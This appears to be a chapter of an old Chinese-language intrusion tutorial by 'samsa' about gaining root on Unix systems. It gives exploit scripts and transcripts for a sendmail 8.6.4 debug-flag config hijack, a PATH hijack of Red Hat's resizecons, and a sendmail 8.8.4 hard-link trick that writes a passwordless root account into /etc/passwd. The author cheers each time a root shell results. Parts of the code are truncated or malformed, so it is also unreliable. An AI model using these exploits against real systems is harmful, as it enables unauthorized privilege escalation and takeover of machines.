samsa网络入侵教程七

/ns/cn/jc/data/20010129104044.htm

2.3) 其他类型的漏洞：
2.3.1) 程序调试后门(backdoor for debugging)
e.g.利用sendmail(8.6.4)的漏洞，让我们先看看程序：

---------------------------- begin: sendbug.sh --------------------------
#!/bin/sh

SENDMAIL=/usr/lib/sendmail
CONFIG=/etc/mail/sendmail.cf
#CONFIG=`strings $SENDMAIL|grep sendmail.cf`
#The strings utility looks for ASCII strings in a binary file.
SHELL=/bin/ksh
CC=gcc

TEMPDIR=/tmp/sendbug-tmp.$$
mkdir $TEMPDIR
chmod 700 $TEMPDIR
cd $TEMPDIR

cp $SENDMAIL sm
chmod 700 sm

echo "creating setid0..."
cat >setid.c << __EOF__
#include <stdio.h>

main(argc,argv)
int argc;
char *argv[];
{ int uid;
setuid(0);

if (getuid() != 0) {puts("setuid(0) failed");exit(1);}
execl(argv[1],"mysh",NULL);
}
__EOF__

$CC -o setid0 setid.c

echo "creating calc..."
cat >calc.c <<__EOF__
#include <fcntl.h>

void
gencore(){
int pid,fd[2];
if(pipe(fd)<0){ perror("pipe");exit(1);}
pid=fork();
if (!pid){
int f=open("./out",O_RDWR|O_CREAT,0666);
dup2(f,1); dup2(fd[0],0);
close(f); close(fd[0]); close(fd[1]);
execl("./sm","sm","-d0-9.90","-oQ.","-bs",0);
perror("exec");
exit(1);
}
else{
sleep(2);
kill(pid,11);
}
close(fd[0]); close(fd[1]);
}

int find(pattern,file)
char *pattern;
char *file;
{ int fd,i,addr; char c;
fd=open(file,O_RDONLY);
i=0; addr=0;
while(read(fd,&c,1)==1){
if (pattern[i ==c) i++;
else i=0;
if (pattern[i =='\0'){
addr-=strlen(pattern);
return(addr);
}
addr++;
}
}

main(argc,argv)
int argc;
char *argv[];
{ unsigned int ConfFile,tTdvect,off;

gencore();
sync();
tTdvect=find("ZZZZZZZZ","core");
ConfFile=find(argv[1],"core");
if (!tTdvect||!ConfFile) return (1);
off=ConfFile-tTdvect;
printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%
off,'/',off+1,'t',off+2,'m',off+3,'p',off+4,'/',off+5,'s',
off+6,'m',off+7,'.',off+8,'c',off+9,'f',off+10);
/* "/tmp/sm.cf" */
}

__EOF__

$CC -o calc calc.c

echo "scanning core image for $CONFIG"

DEBUGFLAGS=`./calc $CONFIG`

echo "creating alias.sh"
cat >alias.sh << __EOF__
#!/bin/sh

/bin/chmod 6777 $TEMPDIR/setid0
/bin/chown root $TEMPDIR/setid0
/bin/sync
__EOF__

chmod 755 alias.sh

echo "creating fake alias file..."
echo "yash: |$TEMPDIR/alias.sh" > aliases

echo "faking alias pointer in new config file..."
egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
cat >> /tmp/sm.cf << __EOF__
OA$TEMPDIR/aliases
Ou0
Og0
DZWHOOP-v1.0
__EOF__

echo "creating the sendmail script..."
cat > sendmail.script << __EOF__
helo
mail from:nobody

---------------------------- end : sendbug.sh --------------------------

运行结果为：

creating setid0...
creating calc...
scanning core image for /etc/mail/sendmail.cf
creating alias.sh
creating fake alias file...
faking alias pointer in new config file...
creating the sendmail script...
executing /usr/lib/sendmail -d4294929924.47,4294929925.116,4294929926.109,42949
9927.112,4294929928.47,4294929929.115,4294929930.109,4294929931.46,4294929932.9
,4294929933.102,4294929934.0 -bs ...
Version SMI-8.6.4
220 sun8. Sendmail SMI-8.6.4/SMI-SVR4 ready at Thu, 20 May 1999 16:09:53 +0900
250 sun8. Hello sws@localhost, pleased to meet you
250 nobody... Sender ok
250 yash... Recipient ok
354 Enter mail, end with "." on a line by itself
250 RAA06733 Message accepted for delivery
221 sun8. closing connection
setid0 is a suid shell.executing...
#

大致过程是这样：

0,编译setid0、calc两个程序；

1，运行calc程序，该程序的目的是要计算sendmail程序的内存映像中标志性字符串
"ZZZZZZZZ"和另一个字符串：sendmail配置文件的路径名，之间的偏移量。
为此，calc的一个子进程运行sendmail的一个拷贝(sm)来替代自己(execl)，主进程
则先sleep 2秒，然后发一个段出错信号(SIGSEGV=11)给该子进程，从而使之产生一
个“段错误”，生成一个"core"文件；之后calc计算该文件中上述两个字符串之间
的偏移量。最后该程序输出一个字符串，其中隐含"/tmp/sm.cf"字样；

2，生成伪造的``sendmail.cf''配置文件，即：/tmp/sm.cf，其中规定sendmail以root
权限运行，并设置了这样一个别名：
"yash: |$TEMPDIR/alias.sh"
使得寄给yash的邮件被重定向给alias.sh这个shell程序，而这个shell程序所做的事
就是把setid0变成SUID ROOT的。

3，运行sendmail，以sendmail.script为输入脚本，这个脚本以nobody的名义向yash别
名发一封邮件，以便触发alias.sh脚本。现在的问题是(也即：最关键的问题），怎么
使得sendmail运行的时候不使用缺省的配置文件(e.g./etc/mail/sendmail.cf,这个文
件是我们无法改写的)，而使用我们伪造的配置文件/tmp/sm.cf ?!
看：

executing /usr/lib/sendmail -d4294929924.47,4294929925.116,4294929926.109,4294
9927.112,4294929928.47,4294929929.115,4294929930.109,4294929931.46,4294929932.
,4294929933.102,4294929934.0 -bs ...

-d 选项是设置某种debug value，具体到这里，就是在e.g.相对于内存映像中相对于字
符串"ZZZZZZZZ"偏移量为4294929924的地方用47代替原来在该位置的值，以此类推，整个 选项的最终结果是，在原来放缺省配置文件路径名(e.g./etc/mail/sendmail.cf)的地方 放上了伪造配置文件的路径名(我前面已经指出：calc输出的字符串中隐含"/tmp/sm.cf") 这样，我们就达到了目的。

(samsa:当然，-d 的这种处理是Sendmail 8.6.4特有的，大概是程序员遗留下的后门吧？)

4,最后，我们检测setid0程序是否已置SUID位，如果是，成功，运行该程序，我们就变成? root!!!

当然，另一个要点是：sendmail本身是SUID ROOT的(自己都不是SUID ROOT的程序又怎么可能把别`人'变成SUID ROOT呢？

$ ls -l /usr/lib/sendmail
-r-sr-xr-x 1 root bin 234980 Oct 25 1995 /usr/lib/sendmail

(samsa[思考]：Sendmail 8.6.4并非那么常见，甚至可遇不可求，不过我们可以得到启发? 即使Sendmail版本不是8.6.4,但如sendmail.cf和alias文件碰巧可写，我们不是也可以做 同样的事吗？...)


2.3.2) 非绝对路径执行(executing not by absolute PATH)
当一个SUID ROOT程序中途要以root权限运行别的相关程序，但没有用全路径名来指定该
程序时，可以通过修改PATH环境变量和放置一个伪造的同名程序在PATH中位置靠前（比真
实程序所在的目录靠前）的某个目录里，即可以root权限程序执行任何我们想执行的程序?

e.g.Linux Red Hat 2.1 中/usr/bin/resizecons是suid root的，它执行restoretextmode
setfont两个相关程序，且未指定绝对路径；exploit程序如下：

-------------------------- begin: wozzeck.sh --------------------------------
#!/bin/sh
#
# wozzeck.sh
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi

-------------------------- end : wozzeck.sh --------------------------------

执行结果：
$ ./wozzeck.sh
================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
================ Checking system vulnerability
++++++++++++++++ System appears vulnerable.
++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
$ /tmp/wozz
#

(samsa:bingo!!!I am root AGAIN!!!)

2.3.3) 硬链接写(hard link writing)
e.g.Sendmail 8.8.4

$ cd /var/tmp
$ ls -ld .
drwxrwxrwt 2 sys sys 512 May 21 17:02 .
$ ln /etc/passwd dead.letter
$ ls -l
total 2
-r--r--r-- 2 root sys 939 May 14 11:05 dead.letter
(发一封无法投递的邮件)
$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun8. Sendmail SMI-8.8.4/SMI-SVR4 ready at Fri, 21 May 1999 17:07:03 +0900
mail from:w@www.ww.w
250 w@www.ww.w... Sender ok
rcpt to:m@mmm.mm.m
250 m@mmm.mm.m... Recipient ok
data
354 Enter mail, end with "." on a line by itself
hacker::0:0:I am a hacker:/:/bin/sh
.
250 RAA00579 Message accepted for delivery
quit
221 sun8. closing connection
Connection closed by foreign host.
$ tail -1 /var/tmp/dead.letter
hacker::0:0:I am a hacker:/:/bin/sh
$ tail -1 /etc/passwd
hacker::0:0:I am a hacker:/:/bin/sh

(samsa:gotcha!!)